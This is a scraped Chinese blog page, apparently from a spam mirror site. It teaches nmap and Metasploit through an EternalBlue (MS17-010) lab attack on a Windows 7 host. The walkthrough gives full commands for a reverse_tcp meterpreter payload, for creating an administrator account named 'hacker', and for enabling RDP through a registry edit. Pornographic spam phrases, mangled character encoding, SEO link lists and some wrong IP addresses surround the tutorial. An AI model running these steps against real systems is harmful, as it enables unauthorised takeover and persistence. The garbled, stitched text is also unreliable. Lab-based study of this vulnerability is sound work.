国产亚洲精品福利在线无卡一,国产精久久一区二区三区,亚洲精品无码国模,精品久久久久久无码专区不卡

當前位置: 首頁 > news >正文

臨沂做網(wǎng)站電話信息發(fā)布平臺推廣有哪些

臨沂做網(wǎng)站電話,信息發(fā)布平臺推廣有哪些,購物商城網(wǎng)站建設(shè)方案,甘肅農(nóng)產(chǎn)品網(wǎng)站建設(shè)MS17-010是微軟于2017年3月發(fā)布的一個安全補丁,旨在修復(fù)Windows操作系統(tǒng)中的一個嚴重漏洞,該漏洞被稱為“永恒之藍”(EternalBlue)。這個漏洞影響了Windows的Server Message Block(SMB)協(xié)議,允許…

????????MS17-010是微軟于2017年3月發(fā)布的一個安全補丁,旨在修復(fù)Windows操作系統(tǒng)中的一個嚴重漏洞,該漏洞被稱為“永恒之藍”(EternalBlue)。這個漏洞影響了Windows的Server Message Block(SMB)協(xié)議,允許攻擊者通過網(wǎng)絡(luò)遠程執(zhí)行代碼。

漏洞背景

  • CVE編號:CVE-2017-0144
  • 影響版本:Windows Vista、Windows 7、Windows 8、Windows 10、Windows Server 2008、Windows Server 2012、Windows Server 2016等多個版本。
  • 攻擊方式:攻擊者可以利用此漏洞發(fā)送特制的請求到目標計算機的SMB服務(wù),從而執(zhí)行惡意代碼,獲取系統(tǒng)權(quán)限。

影響

永恒之藍漏洞的嚴重性在于,它允許攻擊者在沒有用戶交互的情況下,通過網(wǎng)絡(luò)傳播惡意軟件。2017年5月,勒索病毒W(wǎng)annaCry利用此漏洞進行傳播,導(dǎo)致全球范圍內(nèi)的大規(guī)模感染,影響了數(shù)十萬臺計算機。

防護措施

  1. 安裝補丁:及時安裝微軟發(fā)布的MS17-010補丁,以修復(fù)該漏洞。
  2. 關(guān)閉SMBv1:如果不需要,可以考慮禁用SMBv1協(xié)議,以減少攻擊面。
  3. 網(wǎng)絡(luò)防護:使用防火墻和入侵檢測系統(tǒng),限制對SMB端口(如445端口)的訪問。
  4. 定期備份:定期備份重要數(shù)據(jù),以防止勒索軟件攻擊造成的數(shù)據(jù)丟失。

橋接模式

橋接模式就是將主機網(wǎng)卡與虛擬的網(wǎng)卡利用虛擬網(wǎng)橋進行通信。類似于把物理主機虛擬為一個交換機,所有橋接設(shè)置的虛擬機連接到這個交換機的一個接口上,物理主機也同樣插在這個交換機當中,所以所有橋接下的網(wǎng)卡與網(wǎng)卡都是交換模式的,相互可以訪問而不干擾。在橋接模式下,虛擬機IP地址需要與主機在同一網(wǎng)段,如果需要聯(lián)網(wǎng),則網(wǎng)關(guān)與DNS需要與主機網(wǎng)卡一致。

橋接模式下的所有虛擬機都是和主機是在同一網(wǎng)段的,可以把它們看成是"平等"的關(guān)系,這就會帶來一些麻煩,比如192.168.1段下只有254個主機地址,所以橋接模式下虛擬機和物理的總數(shù)不能超過這個數(shù)字!

Nat模式

?

在NAT模式中,主機網(wǎng)卡直接與虛擬NAT設(shè)備相連,然后虛擬NAT設(shè)備與虛擬DHCP服務(wù)器一起連接在虛擬交換機VMnet8上,這樣就實現(xiàn)了虛擬機聯(lián)網(wǎng)。VMware Network Adapter VMnet8網(wǎng)卡是為了實現(xiàn)主機與虛擬機之間的通信。

可見NAT模式下主機更像是虛擬機們的"路由器",通過VMnet8虛擬網(wǎng)卡為虛擬機分發(fā)地址。所以虛擬機和主機不再同一網(wǎng)段下,可以理解為主機是虛擬機的"上級",這也就是為什么橋接模式?jīng)]有VMnet0這個虛擬網(wǎng)卡,因為橋接模式下的虛擬機和主機是"平等"的,共用同一個路由器

VMnet8網(wǎng)卡的作用僅僅是主機與虛擬機之間的通信,訪問外網(wǎng)是不通過VMnet8網(wǎng)卡的!NAT模式下的虛擬機時通過真實主機的ip訪問外網(wǎng)


僅主機模式

僅主機模式可有看成是NAT模式去除了虛擬NAT設(shè)備,然后使用VMware Network Adapter VMnet1虛擬網(wǎng)卡連接VMnet1虛擬交換機來與虛擬機通信的,Host-Only模式將虛擬機與外網(wǎng)隔開,使得虛擬機成為一個獨立的系統(tǒng),只與主機相互通訊。

nmap使用:

????????Nmap(Network Mapper)是一款用于網(wǎng)絡(luò)發(fā)現(xiàn)和安全審計的開源工具。它最初由 Gordon Lyon(也被稱為 Fyodor Vaskovich)開發(fā),是一款功能強大且廣泛使用的網(wǎng)絡(luò)掃描工具。Nmap 允許用戶在網(wǎng)絡(luò)上執(zhí)行主機發(fā)現(xiàn)、端口掃描、服務(wù)識別和版本檢測等操作,以幫助評估網(wǎng)絡(luò)的安全性、發(fā)現(xiàn)主機和服務(wù)、以及識別潛在的安全威脅。

nmap常用命令主機發(fā)現(xiàn) iR                                                                隨機選擇目標-iL                                                                從文件中加載IP地址-sL                                                               簡單的掃描目標-sn                                                               Ping掃描-禁用端口掃描-Pn                                                              將所有主機視為在在線,跳過主機發(fā)現(xiàn)-PS[portlist]                                              (TCP SYN ping) 需要root權(quán)限-PA[portlist]                                              (TCP ACK ping)-PU[portlist]                                              (UDP  ping)-PY [portlist]                                             (SCTP ping)-PE/PP/PM                                                 ICMP回顯,時間戳和網(wǎng)絡(luò)掩碼請求探測-PO[協(xié)議列表]                                            IP協(xié)議Ping-n/-R                                                           從不執(zhí)行DNS解析/始終解析[默認:有時]--dns-servers                                              指定自定義DNS服務(wù)器--system-dns                                              使用OS的dns服務(wù)器--traceroute                                                跟蹤到每個主機的躍點路徑掃描技術(shù)-sS                                                             使用TCP的SYN進行掃描-sT                                                             使用TCP進行掃描-sA                                                            使用TCP的ACK進行掃描-sU                                                            UDP掃描-sI                                                             Idle掃描-sF                                                            FIN掃描-b<FTP中繼主機>                                     FTP反彈掃描端口規(guī)格和掃描順序-p                                                              掃描指定端口--exclude-ports                                         從掃描中排除指定端口-f                                                               快速模式-掃描比默認掃描更少的端口-r                                                               連續(xù)掃描端口-不隨機化--top-ports                                                 掃描<number>最常用的端口服務(wù)/版本探測-sV                                                            探測服務(wù)/版本信息--version-intensity                                     設(shè)置版本掃描強度(0-9)--version-all                                              嘗試每個強度探測--version-trace                                          顯示詳細的版本掃描活動(用于調(diào)試)腳本掃描-SC                                                           等效于 --script=defult--script = <lua scripts>,<lua scripts>        以逗號分隔的目錄,腳本文件或腳本類別--script-args = <n1=v1, n2=v2>               為腳本提供參數(shù)--script-args-file=文件名                          從文件名中加載腳本參數(shù)--script-trace                                            顯示發(fā)送和接受的所有數(shù)據(jù)--script-updatedb                                     更新腳本數(shù)據(jù)庫--script-help=<lua scripts>                      顯示有關(guān)腳本的幫助操作系統(tǒng)檢測-o                                                            啟用os檢測--osscan-limit                                          將os檢測限制為可能的目標--osscan-guess                                       推測操作系統(tǒng)檢測結(jié)果時間和性能--host-timeout                                         設(shè)置超時時間--scan-delay                                           設(shè)置探測之間的時間間隔-T  <0-5>                                                設(shè)置時間模板,值越小,IDS報警幾率越低防火墻/IDS規(guī)避和欺騙-f                                                             報文分段-s                                                             欺騙源地址-g                                                            使用指定的本機端口--proxies <url,port>                                 使用HTTP/SOCK4代理-data<hex string>                                   想發(fā)送的數(shù)據(jù)包中追加自定義的負載--data-string                                            將自定義的ACSII字符串附加到發(fā)送數(shù)據(jù)包中   --data-length                                           發(fā)送數(shù)據(jù)包時,附加隨機數(shù)據(jù)--spoof-mac                                            MAC地址欺騙--badsum                                                發(fā)送帶有虛假TCP/UNP/STCP校驗和的數(shù)據(jù)包輸出-oN                                                         標準輸出-oX                                                         XMl輸出-oS                                                         script jlddi3-oG                                                        grepable-oA                                                         同時輸出三種主要格式-v                                                           信息詳細級別-d                                                           調(diào)試級別--packet-trace                                        跟蹤發(fā)送和接收的報文--reason                                                 顯示端口處于特殊狀態(tài)的原因--open                                                    僅顯示開放的端口雜項-6                                                          啟動Ipv6掃描-A                                                          啟動Os檢測,版本檢測,腳本掃描和traceroute-V                                                          顯示版本號

網(wǎng)絡(luò)掃描神器:Nmap 保姆級教程(附鏈接)_虛擬機怎么安裝nmap-CSDN博客

MSF使用:

????????MSF使用詳解-安全客 - 安全資訊平臺

【工具使用】——Metasploit(MSF)使用詳解(超詳細)-CSDN博客

msf使用詳解 · Drunkmars's Blog

????????Metasploit Framework(MSF)是一款開源安全漏洞檢測工具,附帶數(shù)千個已知的軟件漏洞,并保持持續(xù)更新。Metasploit可以用來信息收集、漏洞探測、漏洞利用等滲透測試的全流程,被安全社區(qū)冠以“可以黑掉整個宇宙”之名。剛開始的Metasploit是采用Perl語言編寫的,但是再后來的新版中,改成了用Ruby語言編寫的了。在kali中,自帶了Metasploit工具。我們接下來以大名鼎鼎的永恒之藍MS17_010漏洞為切入點,講解MSF框架的使用。???

1.打開msfconsole工具:kali終端輸入 msfconsole

2.搜索漏洞: search 漏洞名字

3.選擇相關(guān)模塊:use 模塊號

4.顯示出有效的攻擊載荷:show options

5.設(shè)置目標ip:set rhosts 目標ip

6.執(zhí)行攻擊:run 或 exploit

7.退出到msf:back

Metasploit

Metasploit Framework(MSF)是一款開源安全漏洞檢測工具,附帶數(shù)千個已知的軟件漏洞,并保持持續(xù)更新。Metasploit可以用來信息收集、漏洞探測、漏洞利用等滲透測試的全流程,被安全社區(qū)冠以“可以黑掉整個宇宙”之名。剛開始的Metasploit是采用Perl語言編寫的,但是再后來的新版中,改成了用Ruby語言編寫的了。在kali中,自帶了Metasploit工具。我們接下來以大名鼎鼎的永恒之藍MS17_010漏洞為切入點,講解MSF框架的使用。

?

·? 進入框架:msfconsole

·? 使用search命令查找相關(guān)漏洞: search ms17-010

·? 使用use進入模塊: use exploit/windows/smb/ms17_010_eternalblue

·? 使用info查看模塊信息: info

·? 設(shè)置攻擊載荷:set payload windows/x64/meterpreter/reverse_tcp

·? 查看模塊需要配置的參數(shù):show options

·? 設(shè)置參數(shù):set RHOST 192.168.125.138

·? 攻擊:exploit / run

·? 后滲透階段

不同的攻擊用到的步驟也不一樣,這不是一成不變的,需要靈活使用。

我們也可以將攻擊代碼寫入 configure.rc(只要是以 .rc 結(jié)尾的文件)配置文件中,然后使用命令msfconsole -r configure.rc 進行自動攻擊!

漏洞利用(exploit)

漏洞利用exploit,也就是我們常說的 exp,他就是對漏洞進行攻擊的代碼。

exploit漏洞利用模塊路徑:/usr/share/metasploit-framework/modules/exploits

這里面有針對不同平臺的 exploit 。

我們現(xiàn)在就進 windows 平臺看看,這里會列出針對windows平臺不同服務(wù)的漏洞利用

我們進入smb服務(wù),這是windows中經(jīng)常爆出漏洞的服務(wù),比如我們的永恒之藍漏洞就在這里面。漏洞利用代碼是以 rb 結(jié)尾的文件,因為metasploit是用Ruby語言編寫的。

攻擊載荷(payload)

payload模塊路徑:/usr/share/metasploit-framework/modules/payloads

點擊并拖拽以移動

Payload中包含攻擊進入目標主機后需要在遠程系統(tǒng)中運行的惡意代碼,而在Metasploit中Payload是一種特殊模塊,它們能夠以漏洞利用模塊運行,并能夠利用目標系統(tǒng)中的安全漏洞實施攻擊。簡而言之,這種漏洞利用模塊可以訪問目標系統(tǒng),而其中的代碼定義了Payload在目標系統(tǒng)中的行為。

Shellcode :Shellcode是payload中的精髓部分,在滲透攻擊時作為攻擊載荷運行的一組機器指令。Shellcode通常用匯編語言編寫。在大多數(shù)情況下,目標系統(tǒng)執(zhí)行了shellcode這一組指令 之后,才會提供一個命令行shell。

Metasploit中的 Payload 模塊主要有以下三種類型:

  • -Single

  • -Stager

  • -Stage

  • ·? Single是一種完全獨立的Payload,而且使用起來就像運行 calc.exe 一樣簡單,例如添加一個系統(tǒng)用戶或刪除一份文件。由于Single Payload是完全獨立的,因此它們有可能會被類似 netcat 這樣的非metasploit處理工具所捕捉到。
  • ·? Stager這種Payload負責(zé)建立目標用戶與攻擊者之間的網(wǎng)絡(luò)連接,并下載額外的組件或應(yīng)用程序。一種常見的Stager Payload就是reverse_tcp,它可以讓目標系統(tǒng)與攻擊者建立一條tcp連接,讓目標系統(tǒng)主動連接我們的端口(反向連接)。另一種常見的是bind_tcp,它可以讓目標系統(tǒng)開啟一個tcp監(jiān)聽器,而攻擊者隨時可以與目標系統(tǒng)進行通信(正向連接)。
  • ·? Stage是Stager Payload下的一種Payload組件,這種Payload可以提供更加高級的功能,而且沒有大小限制。

在 Metasploit 中,我們可以通過Payload的名稱和使用格式來推斷它的類型:

Single Payload的格式為:<target>/ <single>  如:windows/powershell_bind_tcp
Stager/Stage Payload的格式為:<target>/ <stage> / <stager>  如:windows/meterpreter/reverse_tcp

當我們在Metasploit中執(zhí)行 show payloads 命令之后,它會給我們顯示一個可使用的Payload列表:

在這個列表中,像 windows/powershell_bind_tcp 就是一個Single Payload,它不包含Stage Payload

而 windows/meterpreter/reverse_tcp 則由一個Stage Payloadmeterpreter)和 一個Stager Payloadreverse_tcp)組成

Stager中幾種常見的payload

windows/meterpreter/bind_tcp       #正向連接
windows/meterpreter/reverse_tcp    #反向連接,常用
windows/meterpreter/reverse_http   #通過監(jiān)聽80端口反向連接
windows/meterpreter/reverse_https  #通過監(jiān)聽443端口反向連接正向連接使用場景:我們的攻擊機在內(nèi)網(wǎng)環(huán)境,被攻擊機是外網(wǎng)環(huán)境,由于被攻擊機無法主動連接到我們的主機,所以就必須我們主動連接被攻擊機了。但是這里經(jīng)常遇到的問題是,被攻擊機上開了防火墻,只允許訪問指定的端口,比如被攻擊機只對外開放了80端口。那么,我們就只能設(shè)置正向連接80端口了,這里很有可能失敗,因為80端口上的流量太多了反向連接使用場景:我們的主機和被攻擊機都是在外網(wǎng)或者都是在內(nèi)網(wǎng),這樣被攻擊機就能主動連接到我們的主機了。如果是這樣的情況,建議使用反向連接,因為反向連接的話,即使被攻擊機開了防火墻也沒事,防火墻只是阻止進入被攻擊機的流量,而不會阻止被攻擊機主動向外連接的流量。反向連接80和443端口使用場景:被攻擊機能主動連接到我們的主機,還有就是被攻擊機的防火墻設(shè)置的特別嚴格,就連被攻擊機訪問外部網(wǎng)絡(luò)的流量也進行了嚴格的限制,只允許被攻擊機的80端口或443端口與外部通信

點擊并拖拽以移動

Meterpreter

Meterpreter屬于stage payload,在Metasploit Framework中,Meterpreter是一種后滲透工具,它屬于一種在運行過程中可通過網(wǎng)絡(luò)進行功能擴展的動態(tài)可擴展型Payload。這種工具是基于“內(nèi)存DLL注入”理念實現(xiàn)的,它能夠通過創(chuàng)建一個新進程并調(diào)用注入的DLL來讓目標系統(tǒng)運行注入的DLL文件。

Meterpreter是如何工作的?

首先目標先要執(zhí)行初始的溢出漏洞會話連接,可能是 bind正向連接,或者反彈 reverse 連接。反射連接的時候加載dll鏈接文件,同時后臺悄悄處理 dll 文件。其次Meterpreter核心代碼初始化,通過 socket套接字建立一個TLS/1.0加密隧道并發(fā)送GET請求給Metasploit服務(wù)端。Metasploit服務(wù)端收到這個GET請求后就配置相應(yīng)客戶端。最后,Meterpreter加載擴展,所有的擴展被加載都通過TLS/1.0進行數(shù)據(jù)傳輸。

Meterpreter的特點:

·? Meterpreter完全駐留在內(nèi)存,沒有寫入到磁盤

·? Meterpreter注入的時候不會產(chǎn)生新的進程,并可以很容易的移植到其它正在運行的進程

·? 默認情況下, Meterpreter的通信是加密的,所以很安全

·? 擴展性,許多新的特征模塊可以被加載。

我們在設(shè)置 payloads 時,可以將 payloads 設(shè)置為:windows/meterpreter/reverse_tcp ,然后獲得了 meterpreter> 之后我們就可以干很多事了!具體的做的事,在我們下面的后滲透階段都有講!

?

kali控制臺輸入:msfconsole 進入metasploit框架

尋找MS17_010漏洞: search ms17_010

這里找到了兩個模塊,第一個輔助模塊是探測主機是否存在MS17_010漏洞,第二個是漏洞利用模塊,我們先探測哪些主機存在漏洞

Auxiliary輔助探測模塊

該模塊不會直接在攻擊機和靶機之間建立訪問,它們只負責(zé)執(zhí)行掃描,嗅探,指紋識別等相關(guān)功能以輔助滲透測試。

輸入命令:use auxiliary/scanner/smb/smb_ms17_010

查看這個模塊需要配置的信息:show options

RHOSTS 參數(shù)是要探測主機的ip或ip范圍,我們探測一個ip范圍內(nèi)的主機是否存在漏洞

輸入:set RHOSTS 192.168.125.125-129.168.125.140

輸入:exploit 攻擊,這里有+號的就是可能存在漏洞的主機,這里有3個主機存在漏洞

Exploit漏洞利用模塊

然后我們就可以去利用漏洞攻擊了,選擇漏洞攻擊模塊: use exploit/windows/smb/ms17_010_eternalblue

查看這個漏洞的信息:info

查看可攻擊的系統(tǒng)平臺,這個命令顯示該攻擊模塊針對哪些特定操作系統(tǒng)版本、語言版本的系統(tǒng):show targets

這里只有一個,有些其他的漏洞模塊對操作系統(tǒng)的語言和版本要求的很嚴,比如MS08_067,這樣就要我們指定目標系統(tǒng)的版本的。如果不設(shè)置的話,MSF會自動幫我們判斷目標操作系統(tǒng)的版本和語言(利用目標系統(tǒng)的指紋特征)

Payload攻擊載荷模塊

攻擊載荷是我們期望在目標系統(tǒng)在被滲透攻擊之后完成的實際攻擊功能的代碼,成功滲透目標后,用于在目標系統(tǒng)上運行任意命令。

查看攻擊載荷:show payloads

該命令可以查看當前漏洞利用模塊下可用的所有Payload

設(shè)置攻擊載荷:set payload windows/x64/meterpreter/reverse_tcp

點擊并拖拽以移動

查看模塊需要配置的參數(shù): show options

設(shè)置RHOST,也就是要攻擊主機的ip:set RHOST 192.168.125.138

設(shè)置LHOST,也就是我們主機的ip,用于接收從目標機彈回來的shell:set LHOST 192.168.125.129

如果我們這里不設(shè)置lport的話,默認是4444端口監(jiān)聽

攻擊: exploit

點擊并拖拽以移動

后滲透階段

運行了exploit命令之后,我們開啟了一個reverse TCP監(jiān)聽器來監(jiān)聽本地的 4444 端口,即我(攻擊者)的本地主機地址(LHOST)和端口號(LPORT)。運行成功之后,我們將會看到命令提示符 meterpreter > 出現(xiàn),我們輸入: shell 即可切換到目標主機的windows shell,要想從目標主機shell退出到 meterpreter ,我們只需輸入:exit

永恒之藍實驗部分 :

??????? 在msf中利用ms17-010漏洞來攻擊系統(tǒng),以熟悉msf工具的使用。

復(fù)現(xiàn)環(huán)境

  • 攻擊機:kali,192.168.222.130
  • 被攻擊機:win7,192.168.222.132 關(guān)閉防火墻

?

?

?

相互ping一下,看看能不能ping通

在kali中使用nmap掃描win7,發(fā)現(xiàn)445端口開放?

nmap:調(diào)用 Nmap 工具。

192.168.222.132:這是目標 IP 地址,表示你要掃描的設(shè)備。

-O:這個選項用于啟用操作系統(tǒng)檢測。Nmap 會嘗試識別目標設(shè)備所運行的操作系統(tǒng)。

-sS:這是一個 TCP SYN 掃描,通常被稱為“半開放掃描”。Nmap 發(fā)送 SYN 數(shù)據(jù)包(連接請求),如果目標主機響應(yīng) SYN-ACK,表示端口開放;如果響應(yīng) RST,表示端口關(guān)閉。這種掃描方式相對隱蔽,不會建立完整的 TCP 連接。

-T4:這個選項用于設(shè)置掃描速度和時間。Nmap 提供了多個時間模板(從 T0 到 T5),T4 表示“快速”,適合在網(wǎng)絡(luò)延遲較低的環(huán)境中使用,可以加快掃描速度,但可能會增加被防火墻或入侵檢測系統(tǒng)檢測到的風(fēng)險。

在kali的終端中打開msfconsole?

.利用search功能搜索ms17-010 搜索到兩個模塊

掃描模塊:auxiliary/admin/smb/ms17_010

攻擊模塊:exploit/windows/smb/ms17_010_eternalblue

使用 模塊3 對目標主機進行掃描,我們可以利用options先看一下選項,發(fā)現(xiàn)存在,ms17-010

????????使用show options選項,查看我們要輸入的具體參數(shù),其中標注了yes的選項是必須的參數(shù),若這個參數(shù)為空,則需要我們填寫。RHOSTS選項為空,所以我們需要填寫,RHOSTS代表要攻擊的目標。輸入r然后按tab鍵可以。

????????設(shè)置RHOSTS,再run。

?進行exp,使用模塊3,并查看選項

search 17-010
use 0
#設(shè)置payload連接的方式,reverse_tcp為反向連接,即受害機主動連接攻擊機,以獲取shell
set payload windows/x64/meterpreter/reverse_tcp
show options
set rhosts 192.168.222.130

?

看看配置文件

設(shè)置 rhosts:192.168.222.132

此處使用 set 命令,設(shè)置一下 RHOSTS (靶機的ip地址)

“rhosts”這個詞在計算機安全和網(wǎng)絡(luò)配置中通常指“遠程主機”(Remote Hosts).

set RHOSTS 192.168.222.132

運行成功會出現(xiàn)meterpreter >
Meterpreter 是 Metasploit 的一個擴展模塊,可以調(diào)用 Metasploit 的一些功能,
對目標系統(tǒng)進行更深入的滲透,如獲取屏幕、上傳/下載文件、創(chuàng)建持久后門等。

運行成功后,就可遠程命令執(zhí)行。

使用chcp 65001?解決亂碼問題

?

創(chuàng)建新的管理員賬戶,賬戶名hacker,密碼12356(在shell控制臺下)

使用net localgroup administrators hacker /add命令,將賬戶設(shè)置為管理員

使用net localgroup administrators命令可查看本地管理員

利用netstat -ano查看3389端口是否開啟,發(fā)現(xiàn)沒有開啟

把3389端口打開?

?REG?ADD?HKLM\SYSTEM\CurrentControlSet\Control\Terminal"?"Server?/v?fDenyTSConnections?/t?REG_DWORD?/d?00000000?/f?

  1. REG ADD:這是用于添加新項或修改現(xiàn)有項的命令。
  2. HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server

    • HKLM:代表 "HKEY_LOCAL_MACHINE",這是 Windows 注冊表中的一個根鍵,存儲了計算機的全局設(shè)置。
    • SYSTEM\CurrentControlSet\Control\Terminal Server:這是注冊表中的一個路徑,指向與終端服務(wù)相關(guān)的設(shè)置。
  3. /v fDenyTSConnections

    • /v:指定要添加或修改的值的名稱。
    • fDenyTSConnections:這是一個值名稱,用于控制遠程桌面連接的設(shè)置。具體來說,它指定是否允許遠程桌面連接。
  4. /t REG_DWORD

    • /t:指定值的數(shù)據(jù)類型。
    • REG_DWORD:表示這個值的數(shù)據(jù)類型是一個雙字(DWORD),通常用于存儲整數(shù)值。
  5. /d 00000000

    • /d:指定要設(shè)置的值的數(shù)據(jù)。
    • 00000000:這是要設(shè)置的值,表示允許遠程桌面連接。具體來說,0(或?00000000)表示不拒絕遠程桌面連接。
  6. /f

    • /f:表示強制執(zhí)行,不會詢問確認。如果沒有這個選項,系統(tǒng)可能會提示用戶確認修改操作。

?連接,rdesktop 192.168.222.132:3389

其他用戶

?可以用rdesktop登錄進去

http://aloenet.com.cn/news/42182.html

相關(guān)文章:

  • 編程課有必要學(xué)嗎丈哥seo博客工具
  • 武漢網(wǎng)站設(shè)計站建設(shè)seo課程
  • 政務(wù)網(wǎng)站的建設(shè)時期的概述品牌策劃公司哪家好
  • 多語言網(wǎng)站實現(xiàn)微信引流推廣怎么做
  • 張家港網(wǎng)站建設(shè)做網(wǎng)站免費的網(wǎng)絡(luò)營銷方式
  • 網(wǎng)站怎么做別名專門搜索知乎內(nèi)容的搜索引擎
  • 網(wǎng)站圖片怎么做超鏈接百家號關(guān)鍵詞排名
  • 萬能造假截圖生成器上海外貿(mào)seo
  • 做的好的購物網(wǎng)站佛山網(wǎng)站設(shè)計實力樂云seo
  • 學(xué)校網(wǎng)站制作方案我對網(wǎng)絡(luò)營銷的理解
  • 購物網(wǎng)站的基本功能營銷網(wǎng)絡(luò)是什么
  • 網(wǎng)站開發(fā)外包報價建設(shè)網(wǎng)站
  • 推薦常州網(wǎng)站建設(shè)seo技術(shù)員
  • 可以做宣傳海報的網(wǎng)站信息流優(yōu)化師簡歷怎么寫
  • 網(wǎng)站目錄怎么做推廣專員是做什么的
  • 最新國際新聞頭條今日國際大事件seo計費系統(tǒng)登錄
  • 做網(wǎng)站濱州市最近的時事新聞
  • 杭州手機申請網(wǎng)站登錄谷歌chrome
  • 哪個網(wǎng)站的圖片可以做素材永久觀看不收費的直播
  • 魏縣做網(wǎng)站網(wǎng)站排名推廣工具
  • 普象工業(yè)設(shè)計網(wǎng)站上海最新事件
  • 上海制作網(wǎng)頁宣傳seo發(fā)展前景怎么樣啊
  • 如何知道網(wǎng)站開發(fā)語言軟文營銷的成功案例
  • wordpress計算器主題優(yōu)化站點
  • 怎么做淘寶客的跳轉(zhuǎn)網(wǎng)站免費的網(wǎng)頁入口
  • 上海企業(yè)網(wǎng)站建設(shè)谷歌關(guān)鍵詞挖掘工具
  • 重慶網(wǎng)站推廣轉(zhuǎn)化率鄭州seo聯(lián)系搜點網(wǎng)絡(luò)效果好
  • 網(wǎng)站建設(shè)及第三方支付沈陽網(wǎng)絡(luò)優(yōu)化培訓(xùn)
  • 西安高校網(wǎng)站建設(shè)整站優(yōu)化價格
  • 中國建設(shè)行業(yè)峰會官方網(wǎng)站torrentkitty磁力天堂